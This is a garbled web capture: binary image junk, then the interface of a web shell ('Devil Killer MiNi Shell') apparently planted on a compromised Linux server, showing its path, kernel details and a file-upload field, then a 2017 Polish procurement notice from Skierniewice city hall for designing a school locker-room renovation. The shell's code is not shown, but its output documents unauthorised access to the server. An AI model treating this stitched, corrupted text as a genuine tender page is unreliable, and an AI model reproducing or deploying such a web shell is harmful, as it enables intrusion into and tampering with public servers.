JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170118/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170118/9868-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.um.skierniewice.pl' target='_blank'>http://www.bip.um.skierniewice.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 9868 - 2017
              z dnia 2017-01-18 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Skierniewice: Opracowanie dokumentacji technicznej dla zadania inwestycyjnego pn.                                      
Przebudowa szatni w Szkole Podstawowej nr 5 w Skierniewicach<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Miasta Skierniewice, krajowy numer identyfikacyjny
              000524306, ul.
              ul. Rynek 
              1,
              96-100 
              Skierniewice, woj.
              łódzkie, państwo
              Polska, tel.
              +48468345100, e-mail
              k.stepien@um.skierniewice.pl, faks
              +48468345151.
              <br />
              Adres strony internetowej (URL): http://www.bip.um.skierniewice.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.um.skierniewice.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />oferty należy składać w formie pisemnej<br />
                Adres:
                <br />Urząd Miasta Skierniewice, ul. Rynek 1, 96-100 Skierniewice, sekretariat </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie dokumentacji technicznej dla zadania inwestycyjnego pn.                                      
Przebudowa szatni w Szkole Podstawowej nr 5 w Skierniewicach<br /><b>Numer referencyjny: </b>RZP.271.7.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Opracowanie dokumentacji technicznej dla zadania inwestycyjnego                                               pn. Przebudowa szatni w Szkole Podstawowej nr 5 w Skierniewicach

I. Informacje ogólne
1.  Nazwa  i adres Zamawiającego:
Miasto Skierniewice, ul. Rynek 1, 96-100 Skierniewice, strona internetowa: www.bip.um.skierniewice.pl nr telefonu 0-46 834-51-00; 832-57-74 nr faksu  0-46 834-51-51;  0-46  832-57-74, zwane dalej Zamawiającym, zaprasza do złożenia ofert w przetargu nieograniczonym  na Opracowanie dokumentacji technicznej dla zadania inwestycyjnego pn. Przebudowa szatni w Szkole Podstawowej nr 5                       w Skierniewicach
   
2. Rodzaj zamówienia: 
Usługi
3. Tryb udzielenia zamówienia:
Przetarg nieograniczony przeprowadzany jest na podstawie art. 39 ustawy z dnia 29 stycznia 2004 r.  Prawo zamówień publicznych (Dz. U. z 2015 r. poz. 2164 z późniejszymi zmianami) zwanej dalej ustawą lub ustawą Pzp.
4. Zamawiający nie dopuszcza składania ofert częściowych. 
5. Zamawiający nie dopuszcza składania ofert wariantowych ani równoważnych.
6. Zamawiający  nie dopuszcza udzielenia zamówień uzupełniających

7. Czas trwania zamówienia lub termin wykonania:  
I etap 
17.03.2017r.  termin opracowania koncepcji funkcjonalno  użytkowej wraz z określeniem kategorii obiektu 

II etap
19.05.2017r.  termin złożenia wszystkich opracowań projektowych i uzyskania pozwolenia na  budowę i/lub dokonanie zgłoszenia robót budowlanych.
Za termin złożenia uznaje się datę osobistego dostarczenia do siedziby Zamawiającego.
Poza ustalonymi wyżej terminami Wykonawca zobowiązany jest do stosowania terminów wynikających z ustaleń rad technicznych. 

8. Źródła finansowania zadania: Środki własne budżetu Miasta Skierniewice
9. Nazwa zadania, roboty oraz ich lokalizacja
Opracowanie dokumentacji technicznej dla zadania inwestycyjnego pn. Przebudowa szatni w Szkole Podstawowej nr 5 w Skierniewicach.

9.1  Wspólny słownik kodów CPV:
71200000-0 Usługi architektoniczne i podobne
71240000-2 Usługi architektoniczne, inżynieryjne i planowania
71221000-3 Usługi architektoniczne w zakresie obiektów budowlanych
71320000-7 Usługi inżynieryjne w zakresie projektowania
71220000-6  Usługi projektowania architektonicznego
71400000-2 Usługi architektoniczne dotyczące planowania przestrzennego i zagospodarowania terenu
712480008 Nadzór nad projektem i dokumentacją

9.2  Zakres prac
9.2.1. Szczegółowy zakres przedmiotu zamówienia zawarty jest w: Programie funkcjonalno-użytkowym,  stanowiącym załącznik nr 8 do SIWZ i będący jej integralną częścią.
9.2.2. W skład zamówienia wchodzi:
I etap
9.2.1. Inwentaryzacja budowlana 
9.2.2. Ekspertyza - ocena stanu technicznego budynku 
9.2.3. Analiza techniczno-ekonomiczna,
9.2.4. Koncepcja architektoniczna,
9.2.5. Uzgodnienie koncepcji architektonicznej z Dyrektorem Szkoły Podstawowej nr 5.
9.2.6. Zamawiający nie później niż w terminie 5 dni od przekazania uzgodnionej koncepcji przedstawi uwagi do uwzględnienia w kolejnych pracach lub dokona akceptacji przedstawionej koncepcji. 
9.2.7. Do kolejnego etapu Wykonawca przystąpi po przyjęciu bez uwag przez Zamawiającego            I etapu.
9.2.8. Na podstawie wyników prac przedprojektowych przeprowadzonych w ramach Etapu I Zamawiający podejmie decyzję o etapowaniu inwestycji. 

II etap
9.2.9. opracowanie mapy do celów projektowych (w przypadku gdy będzie niezbędna dla realizacji Etapu II)
9.2.10. projekty budowlane i wykonawcze, Specyfikacje Techniczna Wykonania i Odbioru Robót, przedmiary robót, kosztorysy inwestorskie dla w/w opracowań, materiały do wniosku o wydanie decyzji o pozwoleniu na budowę lub/i zgłoszenia robót budowlanych,
9.2.11. uzyskanie wymaganych prawem, wynikających z zakresu przebudowy warunków technicznych, pozwoleń, zezwoleń, w szczególności wynikających z ustawy Prawo budowlane,
9.2.12. określenie w projekcie zakresu przebudowy stanowiącej całość funkcjonalną, której wartość realizacji nie przekroczy kwoty stu tysięcy złotych, przy czym Zamawiający zastrzega sobie możliwość zmiany tej kwoty w terminie przewidzianym na zaakceptowanie koncepcji architektonicznej realizacji programu funkcjonalno-użytkowego,
9.2.13. Wykonanie własnym staraniem i na własny koszt wszelkiego rodzaju pomiarów, map, inwentaryzacji oraz innych czynności i dokumentów, a także uzyskanie wszelkich dokumentów   i decyzji, w tym decyzji administracyjnych, opinii, uzgodnień, zgód a także ekspertyz, warunków technicznych, badań,  które zgodnie z powszechnie obowiązującymi przepisami prawa okażą się niezbędne do wykonania i pozwolą Zamawiającemu na realizację zadań.
9.2.14. Pełnienie nadzoru autorskiego w trakcie realizacji inwestycji. W przypadku wystąpienia braków lub błędów w dokumentacji projektowej, konieczności wykonania dodatkowych opracowań, a także w przypadku konieczności sporządzenia dokumentacji zamiennej, ich wykonania w ramach kwoty umownej wynagrodzenia  nadzoru autorskiego.
9.2.15. Udzielanie pełnych wyjaśnień dotyczących dokumentacji projektowo  kosztorysowej na etapie wykonywania projektów postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych w terminie 3 dni od wezwania przez Zamawiającego, faxem lub pocztą elektroniczną.
9.2.16. Opracowanie dokumentacji zaopatrzonej w wykaz opracowań oraz pisemne oświadczenie Wykonawcy, że została wykonana zgodnie z Umową, zgodnie z obowiązującymi przepisami techniczno-budowlanymi oraz, że jest kompletna z punktu widzenia celu, któremu ma służyć, a ponadto, że kosztorysy inwestorskie są aktualne według stanu na dzień podpisania przez strony protokołu zdawczo-odbiorczego potwierdzającego ich przekazanie Zamawiającemu.
9.2.17. Usunięcie wad dokumentacji, w tym usunięcie jej braków, dokonanie jej uzupełnień bądź wprowadzenie w niej innych zmian - w przypadku zgłoszenia zastrzeżeń do tej dokumentacji przez Zamawiającego lub inne uprawnione Organy - bez dodatkowego wynagrodzenia.
9.2.18. Uzyskanie decyzji o pozwoleniu na budowę lub/i dokonanie skutecznego zgłoszenia              (robót budowlanych), jeżeli zgodnie z powszechnie obowiązującymi przepisami prawa okażą się niezbędne dla realizacji zadania przez Zamawiającego. 
9.2.19. Uczestniczenie osobiste w radach technicznych zwoływanych przez Zamawiającego nie częściej niż raz  na 2 tygodnie z  wykazaniem postępu realizacji prac.
9.2.3. Wskazane jest, aby Wykonawca dokonał wizji lokalnej na terenie realizowanej inwestycji oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty i podpisania umowy. 
9.2.4. Zakres zadania inwestycyjnego oraz szczegółowy zakres przedmiotu zamówienia zawarty                    w załączniku  nr 8  do SIWZ może ulec zmianie, o ile wyniknie to z ustaleń i uzgodnień dokonywanych w trakcie wykonywania przedmiotu zamówienia  dokumentacji projektowej,              w szczególności ustaleń z Zamawiającym, na etapie uzgadniania rozwiązań projektowych.   
9.2.5. Wykonawca zobowiązany jest niezwłocznie po podpisaniu umowy do wystąpienia do Zamawiającego z wnioskiem o wystawienie stosownego pełnomocnictwa/pełnomocnictw w celu realizacji zamówienia. Strony zgodnie ustalają, że Zamawiający udzieli wskazanym przez Wykonawcę osobom - pełnomocnictw do reprezentowania Zamawiającego i występowania w jego imieniu przed organami i instytucjami administracyjnymi we wszystkich sprawach formalno-prawnych związanych ze składaniem wniosków, uzyskania niezbędnych pozwoleń, opinii, uzgodnień oraz warunków przyłączeniowych mających na celu wydanie prawomocnej decyzji             o pozwoleniu na budowę lub/i skutecznego zgłoszenia robót budowlanych. Pełnomocnictwa,          o których mowa powyżej nie będą zawierały upoważnienia do zaciągania przez Wykonawcę, czy też wskazane przez niego osoby - jakichkolwiek zobowiązań w imieniu i na rzecz Zamawiającego.
9.2.6. Zamawiający zobowiązuje się do przekazania Wykonawcy będących w jego posiadaniu materiałów źródłowych, niezbędnych do wykonania przedmiotu zamówienia w terminach uzgodnionych przez Strony.
9.2.7. Wykonawca oświadcza, że posiada zdolność techniczną lub zawodową potrzebne do realizacji w/w zadania,  znajduje się w sytuacji ekonomicznej i finansowej pozwalającej na realizację przedmiotu zamówienia oraz posiada stosowne uprawnienia.
9.2.11. Wykonawca zapewni wykonanie świadczeń objętych Umową z należytą profesjonalną starannością, w sposób zgodny z wymaganiami przepisów prawa i obowiązującymi Normami oraz zasadami wiedzy technicznej, a także z zachowaniem standardów właściwych dla danej kategorii prac.
9.2.12. Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za szkody będące następstwem niewykonania lub nienależytego wykonania przez niego obowiązków wynikających z Umowy.
9.2.13. Wszystkie zaproponowane urządzenia i rozwiązania techniczne muszą spełniać wymogi obowiązujących norm i przepisów prawa.
9.2.14. Zastosowane materiały winny spełniać wymogi prawa budowlanego, być zgodne z wymogami technicznymi Polskich Norm lub aprobatą techniczną, o ile dla danego wyrobu nie ustanowiono Polskiej Normy; wymagane są materiały atestowane i dopuszczone do stosowania.
9.2.15. Zamawiający wymaga, aby opracowanie było kompletnym materiałem, na podstawie którego Zamawiający będzie mógł przeprowadzić postępowanie przetargowe na wykonanie przedmiotowych obiektów.
9.2.16. Zamawiający wymaga aby dokumentacja była sporządzona zgodnie z wymogami prawa zamówień publicznych, uwzględniając wszystkie wymagania i okoliczności mogące mieć wpływ na proces sporządzania oferty, a więc taki, który nie utrudni uczciwej konkurencji, zakazuje się wskazania znaków towarowych, patentów lub pochodzenia.
9.2.17. Z czynności odbioru przedmiotu zamówienia zostanie spisany protokół nie później niż w terminie 10 dni roboczych po przekazaniu przez Wykonawcę kompletnego przedmiotu zamówienia.                

UWAGA: Przed rozpoczęciem prac należy przedstawić Zamawiającemu harmonogram rzeczowy opracowania dokumentacji. 

9.3. Zakres ilościowy opracowań
I etap
9.3.1. Inwentaryzacja budowlana w zakresie niezbędnym dla realizacji zadania - min. 1 egz. w wersji papierowej, 1 egz. w wersji elektronicznej (dwg.),
9.3.2. Ekspertyza - ocena stanu technicznego budynku w zakresie niezbędnym dla realizacji zadania             - min. 1 egz. w wersji papierowej, 1 egz. w wersji elektronicznej (pdf.),
9.3.3. Analiza techniczno-ekonomiczna - min. 1 egz. w wersji papierowej, 1 egz. w wersji elektronicznej (pdf.),
9.3.4. Koncepcja architektoniczna - 2 egz. w wersji papierowej, 2 egz. w wersji elektronicznej.
II etap
9.3.5. Projekty budowlane - wynikające z przyjętych rozwiązań (6 egz. w wersji papierowej, 2 egz.                    w wersji elektronicznej). Dotyczy to wszystkich niezbędnych branż,
9.3.6. Projekty wykonawcze (5 egz. w wersji papierowej, 2 egz. w wersji elektronicznej wszystkich niezbędnych branż. Zamawiający dopuszcza możliwość łączenia ze sobą w jedną dokumentację zawartości projektu budowlanego i zawartości projektu wykonawczego, pod warunkiem, że będzie on zawierał wszystkie materiały (rysunkowe i opisowe) niezbędne do prawidłowego wykonania poszczególnych zadań.
9.3.7. Szczegółowe Specyfikacje Techniczne wykonania i odbioru robót (5 egz. w wersji papierowej,              2 egz.   w wersji elektronicznej)  dotyczy wszystkich branż.
9.3.8. Przedmiary robót (3 egz. w wersji papierowej, 2 egz. w wersji elektronicznej w formacie Excel)                        dotyczy wszystkich branż. 
9.3.9. Kosztorysy inwestorskie (3 egz. w wersji papierowej, 2 egz. w wersji elektronicznej                        w formacie  excel)  dotyczy wszystkich branż,
9.3.10. Wszystkie inne materiały (projekty, dokumentacje, uzgodnienia) nie wymienione, a niezbędne dla kompletnego wykonania zamówienia, wynikające z przyjętych rozwiązań przez projektanta.
Zamawiający wymaga by Wykonawca przekazał w/w opracowania osobiście w siedzibie Zamawiającego pod adresem Biuro Planowania Przestrzennego i Planowania Inwestycji Urzędu Miasta Skierniewice                   ul. Floriana 9; 96-100 Skierniewice. 
II. Opis przedmiotu zamówienia:
1. Charakterystyka przedmiotu zamówienia:
Przedmiot zamówienia obejmuje wykonanie kompletnych, kompleksowych, wielobranżowych dokumentacji projektowych budowlanych, wykonawczych i kosztorysowych wraz z uzyskaniem  pozwolenia na budowę lub/i zgłoszenia robót budowlanych oraz z pełnieniem nadzoru autorskiego                     w trakcie realizacji robót budowlanych,  szczegółowo opisanych cz. I pkt 9.2 i 9.3 SIWZ.

<br /><br /><b>II.5) Główny kod CPV: </b>71200000-0<br /><b> Dodatkowe kody CPV:</b>71240000-2,
                71221000-3,
                71320000-7,
                71220000-6,
                71400000-2,
                71248000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 19/05/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>I etap 
17.03.2017r.  termin opracowania koncepcji funkcjonalno  użytkowej wraz z określeniem kategorii obiektu 

II etap
19.05.2017r.  termin złożenia wszystkich opracowań projektowych i uzyskania pozwolenia na  budowę i/lub dokonanie zgłoszenia robót budowlanych.
Za termin złożenia uznaje się datę osobistego dostarczenia do siedziby Zamawiającego.
Poza ustalonymi wyżej terminami Wykonawca zobowiązany jest do stosowania terminów wynikających z ustaleń rad technicznych. </div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.nie podlegają wykluczeniu z postępowania.
Ocena potwierdzenia spełniania warunku zostanie wstępnie dokonana przez Zamawiającego na podstawie złożonego oświadczenia wg wzoru załącznika Nr 3 do SIWZ, na zasadzie spełnia/nie spełnia
2. spełniają warunki udziału w postępowaniu.
a) posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej,
o ile wynika to z odrębnych przepisów,
b) sytuacji ekonomicznej lub finansowej,
c) zdolności technicznej lub zawodowej
             Ocena potwierdzenia spełniania warunków zostanie wstępnie dokonana przez Zamawiającego na podstawie złożonego oświadczenia wg wzoru załącznika Nr 2 do SIWZ, na zasadzie spełnia/nie spełnia. 
1.3. Warunki udziału w postępowaniu dotyczące posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów.
3.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają uprawnienia do wykonywania działalności objętej przedmiotem zamówienia, na dowód tego złożą oświadczenie wzór załącznik nr 2 do SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający uzna za spełniony warunek dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykonawcy złożą oświadczenie  wg. wzoru załącznik nr 2 do SIWZ <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. Wykonawcy ubiegający się o zamówienie spełnią warunek dotyczący zdolności technicznej lub zawodowej, jeżeli oświadczą zgodnie z załącznikiem nr 2 do SIWZ.
2. Wykonawcy ubiegający się o zamówienie spełnią warunek dotyczący zdolności technicznej lub zawodowej, jeżeli oświadczą, że skierują do wykonania przedmiotu zamówienia - dokumentację projektową osoby posiadającej odpowiednie uprawnienia do projektowania, w szczególności które zgodnie z ustawą  z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2016 r., poz. 1725) posiadają odpowiednie uprawnienia projektowe, są członkami właściwej izby samorządu zawodowego oraz posiadają ubezpieczenie od odpowiedzialności cywilnej za szkody, do których może dojść w związku z wykonywaniem samodzielnych funkcji technicznych w budownictwie - wg wzoru stanowiącego załącznik nr 4 do SIWZ.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
